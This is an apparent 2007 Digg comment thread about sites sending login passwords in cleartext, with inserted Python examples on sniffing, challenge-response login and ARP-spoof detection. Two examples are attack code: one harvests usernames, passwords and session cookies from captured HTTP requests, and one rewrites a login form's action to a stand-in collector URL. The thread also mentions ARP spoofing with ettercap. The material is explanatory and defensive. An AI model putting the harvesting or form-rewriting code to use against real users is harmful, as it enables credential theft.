98 Comments
- quasipalm, on 10/12/2007, -3/+57
Not to mention that some of these are misleading. Amazon does not use cleartext by default. The default is encrypted. However, if your browser doesn't cooperate, you can log in with cleartext.
It's a feature, not a bug, in this case. You actually have to try and be insecure on Amazon.
- inactive, on 10/12/2007, -20/+51
Really, this is old news. A lot of people still don't realize what this even means, of course. This, however, is just another example of a stupid weblogger stating the obvious in an attempt to sound officiating or intelligent. OMG HTTP requests in the clear!!!! Ten bucks says the guy updates his website with FTP anyway.
- merreborn, on 10/12/2007, -1/+30
The defcon wall of sheep only worked because it was sniffing data sent by defcon attendants over the defcon network.
So, yeah, if you can't trust your own LAN, you have something to worry about. In reality, if you've got a single PC at home, hooked directly to your DSL modem, passwords sent in the clear are very, very rarely going to be sniffed, as it would require either your ISP or the site you're logging in to to be compromised. If the site you're logging into is compromised, SSL isn't going to help you most of the time anyway.
- houdoken, on 10/12/2007, -1/+24
MY_PASSWORD_FLAPPING_IN_THE_WIND was pretty amusing :D
- inactive, on 10/12/2007, -2/+24
You know, it's pretty simple to look for "https" instead of "http".
- MicrowavedH2o, on 10/12/2007, -5/+23
damn man, learn to wrap your text... my monitor isn't that wide.
- Chewie67, on 10/12/2007, -1/+17
@AICkieran - "Yeah, i mean god forbid anyone comment on a story or digg something using our usernames eh?"
Of course, that's not a major issue.
What is a major issue, however, is that many FOOLISH people use the same password everywhere. So, the same password (and username) they use on Digg also gets used on their Citibank account. Once you find it on Digg, you can use it on Citibank...and Amazon.com...and Buy.com...and every other flippin' web site that person has ever signed up for.
That's the danger of clear text passwords...
- Jaymoon, on 10/12/2007, -1/+15
But if you are using NetZero... 90% chance you have dialup....
Who is sniffing dialup traffic, and how would that even be possible unless it's coming from NetZero's end?
- Anth, on 10/12/2007, -3/+17
@rkuchiki
WTF? Most Cable ISPs have had peer to peer turned off since 1999. You can't see your neighbor's traffic at all.
- davdav, on 10/12/2007, -0/+12
Same with Juno, and who uses Cox Webmail? Honestly. Worst interface ever.
- WhackingDay, on 10/12/2007, -1/+12
Wow.. I sure wouldn't want anyone to have access to my Classmates.com account. ONOZ!!one!one!!.
- Snuffkin, on 10/12/2007, -2/+11
It doesn't matter what Amazon 'defaults' to, they DO NOT IMPLEMENT SSL CORRECTLY.
Try the following: Go to Amazon, log out if you're signed in, and go to the sign in page. It probably says something like 'The secure server will encrypt your information'. However, if you look at the URL, you will see quite plainly that it is standard HTTP.
This approach is not uncommon (having the actual login page unencrypted, and only having the form post over HTTPS), but it is severely flawed.
Because the login page is unencrypted, anyone with access to intercept data going over the wire could alter the login page so that the form posts to some other site that captures the passwords submitted to it. You'd never even get warned, because it's not like anyone keeps 'warn me when submitting unencrypted data' on.
SSL is not just about encryption. It is about verifying the identity of the remote party. Not encrypting the login form completely defeats this, as you don't get an opportunity to verify the party before submitting your details.
Assuming everything is normal, sure, your details will go encrypted over the wire. Anyone with the ability to alter data as it goes over the wire can still capture your Amazon login very, very easily.
- paulmdx, on 10/12/2007, -0/+8
Fragment from Ethereal:
"Host: www.digg.com Content-Length: 91 Connection: Keep-Alive
Cache-Control: no-cache Cookie: PHPSESSID=8dde830b0852d127bfbe48a253a8f796
username=paulmdx&password=zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzz&processlogin=1"
(My password isn't really lots of z's by the way, so don't try "pwning" my account.)
- Blazeix, on 10/12/2007, -0/+8
If you use a modern browser your password will be encrypted when using amazon. It's the old browsers that don't support encryption that transfer the password in plain text.
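What a sniffer actually gets from a cleartext login like the Ethereal fragment paulmdx posted above, as an added example (not code from the thread or from Digg). The capture is constructed in the same shape: the host, cookie name, field names and password are stand-ins. Beyond pulling the password out, it also grabs the session cookie, which is worth as much as the password while the session lives, and handles a GET form that puts the fields in the URL, which is just as visible on the wire.

```python
"""Pull credentials and the session cookie out of a cleartext HTTP login POST.

Added example, not code from the thread or from Digg: the capture below is
constructed in the shape of the Ethereal fragment above (host, cookie name
and field names are stand-ins; the password is a dummy value).
"""
from urllib.parse import parse_qs

# Constructed sample of what a sniffer on the same LAN or wireless segment
# sees when a site posts its login form over plain HTTP.
CAPTURED_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Length: 49\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Cookie: PHPSESSID=8dde830b0852d127bfbe48a253a8f796\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"username=alice&password=hunter2%21&processlogin=1"
)

# Field names that commonly carry a password or an account name.
SECRET_FIELDS = {"password", "passwd", "pass", "pwd", "passwort"}
ACCOUNT_FIELDS = {"username", "user", "login", "email", "uid"}


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return {"method": method, "target": target,
            "headers": headers, "body": body[:length]}


def harvest_credentials(raw: bytes) -> dict:
    """Return host, session cookies and any account/password fields in the request.

    Handles both a POST with a URL-encoded body and a GET form that put the
    fields in the query string; both are equally visible on the wire.
    """
    req = parse_http_request(raw)
    found = {"host": req["headers"].get("host"),
             "session_cookies": {}, "fields": {}}

    # The cookie is as valuable as the password: it is the live session.
    for part in req["headers"].get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            found["session_cookies"][name] = value

    query = ""
    ctype = req["headers"].get("content-type", "")
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        query = req["body"].decode("latin-1")
    elif req["method"] == "GET" and "?" in req["target"]:
        query = req["target"].split("?", 1)[1]

    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() in SECRET_FIELDS or name.lower() in ACCOUNT_FIELDS:
            found["fields"][name] = values[0]   # percent-decoded
    return found


if __name__ == "__main__":
    print(harvest_credentials(CAPTURED_REQUEST))
```

This is the whole "attack": no decryption, no exploit, just reading what was sent. Feed it the TCP payload from any capture tool that reassembles HTTP and the same fields fall out.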
- Thud, on 10/12/2007, -1/+9
@rkuchiki
It's true that cable modems share RF bandwidth (on a segment) but you can NOT sniff your neighbor's packets over a cable modem.
The only packets going through the network port on your cable modem are packets destined for your computer (or local network) specifically.
Your modem transmits on a different frequency band than it receives (a smaller subset of the frequency band of one channel)-- so, first of all, it's not even physically possible for your modem to be receiving on the same frequency that your neighbor is transmitting on. So there's no possibility of using your own modem to "sniff" the transmitted data from your neighbor's modem.
- grilkip, on 10/12/2007, -1/+8
One thing is true anyway, it's not always just the users that are stupid.
- Pile, on 10/12/2007, -3/+9
The article blames the insecurity on the wrong systems. These are only relevant typically if you're running wireless. That's when packet sniffing is most promiscuous, otherwise it would take quite a bit of resources to sniff out even cleartext passwords.
What we learn from this is: DON'T USE WIRELESS.
- Flanker, on 10/12/2007, -0/+6
True regarding Amazon's login process, but you can just change the http to https manually, and things are better. Annoying to have to remember this though.
- Bradl3y, on 10/12/2007, -0/+6
Ever think these people may check their juno or netzero email accounts from their work? What makes you think people would have to sniff their dial-up connection to make these vulnerabilities a reality?
- Obsidian743, on 10/12/2007, -0/+6
The greatest threat to any network is those on the same subnet. Likewise, within any corporate network the greatest threat is the employees on the LAN, not outside intruders.
My company uses several different subnets to separate the departments, i.e. development/IT/tech support/accounting/etc and seems to work quite well in preventing some of the more...tempting...activities.
- mattmac24, on 10/12/2007, -1/+7
so would I be wrong in assuming that unless the web site uses SSL (https) at the login page to a web site, the password is easy to sniff?
is it just me or does digg put our passwords "flapping in the wind"
would have thought such a highly used web site used by (generally) tech savvy people would be better at securing our passwords....of course I could be completely wrong
- paulmdx, on 10/12/2007, -0/+5
It's sent in plain text according to Ethereal.
- Matt2k, on 10/12/2007, -0/+5
> don't packet filters only show the network traffic going through your own NIC.
On most modern switching hubs, this is true (except for broadcast packets). You have to have a monitoring port on your switch, or a router that supports it, or something to that effect.
On wireless all packets are sent to everyone of course. Think about it.
- AICkieran, on 10/12/2007, -1/+5
Yeah, i mean god forbid anyone comment on a story or digg something using our usernames eh?
- Xalorous, on 10/12/2007, -0/+4
it's called ssl, and modern browsers use it
- Bobski, on 10/12/2007, -0/+4
Jeez - My monitor is in 1280x1024 and the only way to not get a horizontal scroll bar is with the browser at full screen. I never run anything full screen. What an asshat of a site designer.
- wicketr, on 10/12/2007, -0/+3
"Because the login page is unencrypted, anyone with access to intercept data going over the wire could alter the login page so that the form posts to some other site that captures the passwords submitted to it. You'd never even get warned, because it's not like anyone keeps 'warn me when submitting unencrypted data' on."
Snuffkin,
I don't believe you are correct about this. As soon as you hit the submit button from the page, it initiates an SSL connection to the page and then transfers the data across the wire. The data is not sent and then encrypted. It doesn't matter if the page you typed it on is SSL or not. What matters is how the data you typed is transmitted over the internet.
Unless you are talking about a hijacked machine that's been compromised already, I'm not aware of a way of what you are describing to be possible. Do you have a link to an example??
- Snuffkin, on 10/12/2007, -0/+3
Um, you might want to read up on CHAP authentication techniques. Sites should rarely store passwords unhashed in the database.
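The disagreement between Snuffkin and wicketr above comes down to one thing: who vouched for the `action` attribute of the form? The following added example (not Amazon's or Digg's code; the HTML is constructed) shows both halves. `rewrite_form_action()` is what anyone on the path can do to a page that arrived over plain HTTP before the browser ever renders it, and `login_form_is_trustworthy()` is the check a client, or a site audit, should apply: the page and every form target must both be HTTPS.

```python
"""Why the login page itself must be HTTPS, not just the form's target.

Added example, not Amazon's or Digg's code; the page below is constructed.
rewrite_form_action() does what anyone on the path can do to HTML that
arrived over plain HTTP; login_form_is_trustworthy() is the check a
client or a site audit should apply before a password is typed into a form.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed: an HTTP page whose form posts to HTTPS, as described above.
ORIGINAL_PAGE = """<html><body>
<p>The secure server will encrypt your information.</p>
<form method="post" action="https://www.example.com/signin">
  <input name="email"><input type="password" name="password">
</form></body></html>"""


class _FormActions(HTMLParser):
    """Collects the action attribute of every <form> in the page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def form_actions(html: str) -> list:
    parser = _FormActions()
    parser.feed(html)
    return parser.actions


_ACTION = re.compile(r'(<form\b[^>]*\baction=")([^"]*)(")', re.IGNORECASE)


def rewrite_form_action(html: str, collector_url: str) -> str:
    """On-path attacker: point the form at a server that logs what is posted.

    Nothing in the browser objects, because the page was never authenticated;
    an unencrypted page carries no proof of who wrote its action attribute.
    """
    return _ACTION.sub(lambda m: m.group(1) + collector_url + m.group(3), html)


def login_form_is_trustworthy(page_url: str, html: str) -> bool:
    """True only if the page and every form target it contains are HTTPS.

    An https:// action on an http:// page proves nothing: the page (and so
    the action) could have been altered in transit before you saw it.
    """
    if urlsplit(page_url).scheme != "https":
        return False
    return all(urlsplit(urljoin(page_url, a)).scheme == "https"
               for a in form_actions(html))


if __name__ == "__main__":
    tampered = rewrite_form_action(ORIGINAL_PAGE, "http://collector.invalid/grab")
    print(form_actions(ORIGINAL_PAGE), form_actions(tampered))
    print(login_form_is_trustworthy("http://www.example.com/signin", ORIGINAL_PAGE))
```

wicketr is right that the POST itself travels over SSL, and Snuffkin is right that this does not help: the attacker does not need to break the encrypted connection, only to make the browser open it to a different host (or to none at all). Note that the collector could itself sit behind a valid HTTPS certificate for some unrelated domain, so checking the action's scheme alone is not a defence; the page being served over HTTPS is the part that actually matters.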
- da404lewzer, on 10/12/2007, -0/+3
it happens anytime you submit information through a form. like this 'submit comment' form that we use on digg. the data is sent the same way. 90% of all sites are rendered on the server end, so a lot of your 'data' you won't see (except on the page render) due to the use of cookies and sessions. the cookie data on your end is usually just a unique id to keep track of your 'session variables' on the server's end. cookie data can be seen in get/post requests, but since sessions are a lot safer to use people are using them more...
what about download? any data sent back from the server is also vulnerable for data harvesting... i mean think about it, if your email address is on the screen, or acct #, or whatever, anyone can get that too with a man in the middle attack...
- nofxjunkee, on 10/12/2007, -3/+6
No kidding. Thank god for copy & pasting into a text editor.
- MarcTheLad, on 10/12/2007, -0/+2
arp arp, arp.
- crzdmn, on 10/12/2007, -2/+4
After investigating the Amazon security, I can tell you that unless you run some really old browsers you won't expose your username/password in plain-text.
Still it is very disconcerting to see that happen, even in old browsers. Bare minimum the passwords should be encrypted with a rotating site key.
- WorldGroove, on 10/12/2007, -0/+2
Just so everyone knows, SBCYahoo uses the Challenge/response method... password never crosses the wire. Sniffing doesn't give any info either. (and we're not talking about session-hi-jacking, so don't mention it).
http://en.wikipedia.org/wiki/Challenge-response_authentication
- PAJK, on 10/12/2007, -0/+2
@Snuffkin:
I'm not talking about storing passwords unhashed in the database. You need to have the password before you can hash it, don't you?
It then must be sent in plain text before it gets to that...and that comes down to the client, whether they support encryption, or JavaScript, if you decide to use that method.
The Web software needs the password in plain text before it hashes it and compares it. Read my original comment again.
- wicketr, on 10/12/2007, -0/+2
Security by obscurity is not a good idea. But it's better than having something called "password" going across the wire. There's a difference between "a bad idea" and "completely stupid and ignorant".
- znsh18, on 10/12/2007, -2/+4
Actually I would disagree on who uses cox or juno mail. I agree their interface is horrible.
I am an IT Tech for an ISP provider myself. I can tell you from experience most ISPs don't care much when it comes to secure email service for their customer. They just put up a page & ask the customer to either setup a pop3 account in outlook or Eudora. Most ISPs would also ask the customer to disable certain security features in Outlook or others as well.
- stygiansonic, on 10/12/2007, -0/+2
Read up on CHAP - using client side JavaScript DOES improve things, but not for "encryption", rather using JavaScript to implement hashing functions as part of a challenge-response authentication system.
- dagr8tim, on 10/12/2007, -1/+3
Most people don't realize their emails are also sent as clear text after they get past your ISP's servers. What's news here?
- Flanker, on 10/12/2007, -1/+3
If you have Opera, just press Ctrl + F11. Fit-width adjustment.
This is not meant to be in defense of the poor web design -- just a tip.
- DigeratiPrime, on 10/12/2007, -0/+2
get Keepass people its free/opensource and has an excellent password generator and database feature.
http://keepass.sourceforge.net/
- nofxjunkee, on 10/12/2007, -0/+2
no, 1280x1024 but I don't browse maximized. the more important thing is I don't *have* to for 95% of websites either.
- Jugalator, on 10/12/2007, -1/+3
"If you use any number of popular web forums or even some commercial services like classmates.com, amazon.com, netzero.com or your provider's webmail service, you may not be aware that you're sending your credentials over the internet in the clear."
Huh?? Don't both Internet Explorer and Firefox tell you so until you check the box "do not warn me about this in the future"?
- ActiveMatx, on 10/12/2007, -0/+2
"In its simple form a packet sniffer simply captures all of the packets of data that pass through a given network interface. Typically, the packet sniffer would only capture packets that were intended for the machine in question. However, if placed into promiscuous mode, the packet sniffer is also capable of capturing ALL packets traversing the network regardless of destination."
I guess it's easier than I thought.... I have always captured packets for the sake of analyzing my own network traffic. (Never intended on viewing others' traffic). I guess I am going to play around with Ethereal a bit, to see if I can sniff out the other traffic on my home network.
- stygiansonic, on 10/12/2007, -0/+2
Even if SSL or an unencrypted connection is unavailable, there is NO NEED to transmit a password in plaintext. A simple CHAP system can be implemented if the client browser supports JavaScript - and while it's no replacement for https, it's better than nothing. For reference:
http://simon.incutio.com/archive/2003/04/20/javascriptMD5
http://pajhome.org.uk/crypt/md5/
Of course MD5 might not be the best choice anymore, but an SHA-1 algorithm for JavaScript is also available at the second URL. The fact that some of these major websites are not using a simple system like this to help with security in their login forms is just stupid, especially since HTTP digest authentication has used it for some time.
- Urusai, on 10/12/2007, -0/+2
Yahoo! Mail used to use JavaScript to encrypt the password. I think they just use https now.
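The challenge-response scheme that Snuffkin, WorldGroove, PAJK and stygiansonic are arguing about, as an added example (not code from any of the sites named in the thread). Both sides run in one process and the wire messages are returned so you can see what an eavesdropper gets. HMAC-SHA256 stands in for the JavaScript MD5/SHA-1 of 2007; the protocol is the same. It also settles PAJK's point: the server does not need the plaintext password at login time, but what it stores instead is password-equivalent for this protocol.

```python
"""Challenge-response login: the password never crosses the wire.

Added example, not code from any site named in the thread. It follows the
scheme the comments describe (server sends a fresh challenge, client
answers with a hash over challenge and password, server compares). HMAC-
SHA256 stands in for the JavaScript MD5/SHA-1 of 2007; the protocol is the
same. No network code: both sides run in-process and the wire messages are
returned so you can see what an eavesdropper would get.
"""
import hashlib
import hmac
import secrets


def password_verifier(password: str) -> bytes:
    """What the server stores instead of the password.

    Caveat: for this protocol the verifier is password-equivalent. Whoever
    reads the database can answer challenges without knowing the password.
    """
    return hashlib.sha256(password.encode("utf-8")).digest()


def respond(challenge: bytes, password: str) -> str:
    """Client side (done in JavaScript in the schemes discussed above)."""
    return hmac.new(password_verifier(password), challenge, hashlib.sha256).hexdigest()


class Server:
    def __init__(self, users: dict):
        self.users = users          # username -> verifier bytes
        self.outstanding = {}       # username -> challenge not yet answered

    def challenge(self, user: str) -> bytes:
        c = secrets.token_bytes(16)          # unpredictable, never reused
        self.outstanding[user] = c
        return c

    def verify(self, user: str, response: str) -> bool:
        c = self.outstanding.pop(user, None)  # single use: a replayed response fails
        verifier = self.users.get(user)
        if c is None or verifier is None:
            return False
        expected = hmac.new(verifier, c, hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, response)


def login(server: Server, user: str, password: str):
    """Run one exchange; return (accepted, messages seen on the wire)."""
    c = server.challenge(user)
    r = respond(c, password)
    wire = [f"S->C challenge={c.hex()}", f"C->S user={user} response={r}"]
    return server.verify(user, r), wire


if __name__ == "__main__":
    srv = Server({"alice": password_verifier("correct horse battery")})
    ok, wire = login(srv, "alice", "correct horse battery")
    print(ok, *wire, sep="\n")
```

Two caveats that stygiansonic's "no replacement for https" covers: an eavesdropper who records a challenge and its response can still run an offline dictionary attack against a weak password, and nothing here authenticates the server, so a rewritten login page (Snuffkin's attack above) can simply ship JavaScript that posts the raw password instead. The scheme keeps the password itself off the wire; it does not keep the login safe against an active attacker.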
- DrDabbles, on 10/12/2007, -2/+4
Yes. Obfuscate. Because we all know how well the practice of security by obscurity works. It seems to me if "password" the string is sent over SSL it would be pretty obfuscated. Seriously. That is the lamest idea ever posted. Ever.
- tweekgeek, on 10/12/2007, -0/+2
Or you can encrypt with a javascript md5 library and send it that way. Yahoo does this, I believe. Cuts down on the cost associated with extra processing for SSL. If the client's disabled JS, well. Then SSL it is.
- Wyzard, on 10/12/2007, -0/+1
Even on a switched network, it's possible to set yourself up as a man-in-the-middle to eavesdrop on other nodes' traffic:
http://en.wikipedia.org/wiki/ARP_spoofing
There are readily-available tools to do this:
http://ettercap.sourceforge.net/
- klenwell, on 10/12/2007, -0/+1
why I increasingly use http://mushpup.org for low-security websites requiring a password -- that way, if my password is compromised this way on one site, it won't compromise any of my other passwords.
and I can even post a reminder publicly -- here's my digg password:
m{this.domain > msw}
- radiofrequency, on 10/12/2007, -0/+1
Something else to consider: if you're hooked up to the net via an insecure (non-encrypted) access point, even if the host server uses SSL connections your username and password are sent in the clear to the access point!
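Wyzard's point above is the answer to the "switches make sniffing impossible" argument earlier in the thread: on a switched segment an attacker sends forged ARP replies so that the victim's frames for the gateway (and the gateway's frames for the victim) go to the attacker's MAC first. The following added example (not from the thread or from ettercap) shows what that looks like from the defender's side. The log is constructed in tcpdump's ARP reply format with made-up addresses; one MAC claiming both the gateway's and a victim's IP is the classic two-way setup.

```python
"""Spotting ARP spoofing from the replies seen on a switched segment.

Added example, not from the thread or from ettercap. The log is constructed
in tcpdump's ARP reply format; addresses are made up. A host that claims
both the gateway's IP and a victim's IP with its own MAC is the classic
setup for sitting in the middle of that victim's traffic.
"""
import re
from collections import defaultdict

ARP_LOG = """\
12:00:01.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:05.000000 ARP, Reply 192.168.1.20 is-at 00:aa:bb:cc:dd:20, length 28
12:00:09.000000 ARP, Reply 192.168.1.1 is-at 00:de:ad:be:ef:01, length 28
12:00:09.500000 ARP, Reply 192.168.1.1 is-at 00:de:ad:be:ef:01, length 28
12:00:10.000000 ARP, Reply 192.168.1.20 is-at 00:de:ad:be:ef:01, length 28
12:00:12.000000 ARP, Request who-has 192.168.1.30 tell 192.168.1.20, length 28
"""

_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})")


def parse_arp_replies(text: str) -> list:
    """(timestamp, ip, mac) for each ARP reply line; requests are ignored."""
    out = []
    for line in text.splitlines():
        m = _REPLY.match(line)
        if m:
            out.append((m["ts"], m["ip"], m["mac"].lower()))
    return out


def detect_arp_spoofing(replies: list, trusted: dict = None):
    """Return (conflicts, suspects).

    conflicts: ip -> sorted MACs that claimed it (more than one, or one that
               disagrees with the trusted table, e.g. a pinned gateway MAC).
    suspects:  MACs that claimed several IPs, at least one of them conflicting.
    """
    trusted = trusted or {}
    macs_for_ip = defaultdict(set)
    ips_for_mac = defaultdict(set)
    for _ts, ip, mac in replies:
        macs_for_ip[ip].add(mac)
        ips_for_mac[mac].add(ip)
    conflicts = {}
    for ip, macs in macs_for_ip.items():
        if len(macs) > 1 or (ip in trusted and macs != {trusted[ip].lower()}):
            conflicts[ip] = sorted(macs)
    suspects = sorted(mac for mac, ips in ips_for_mac.items()
                      if len(ips) > 1 and any(ip in conflicts for ip in ips))
    return conflicts, suspects


if __name__ == "__main__":
    print(detect_arp_spoofing(parse_arp_replies(ARP_LOG),
                              trusted={"192.168.1.1": "00:11:22:33:44:55"}))
```

The `trusted` table matters when the attacker was first and the real gateway's reply never shows up in the window, so there is no "conflict" to see; pinning the gateway MAC (a static ARP entry on the host, or Dynamic ARP Inspection on the switch) is the usual defence for the same reason. None of this helps on an open wireless network, where, as radiofrequency notes, every frame is already visible without any spoofing.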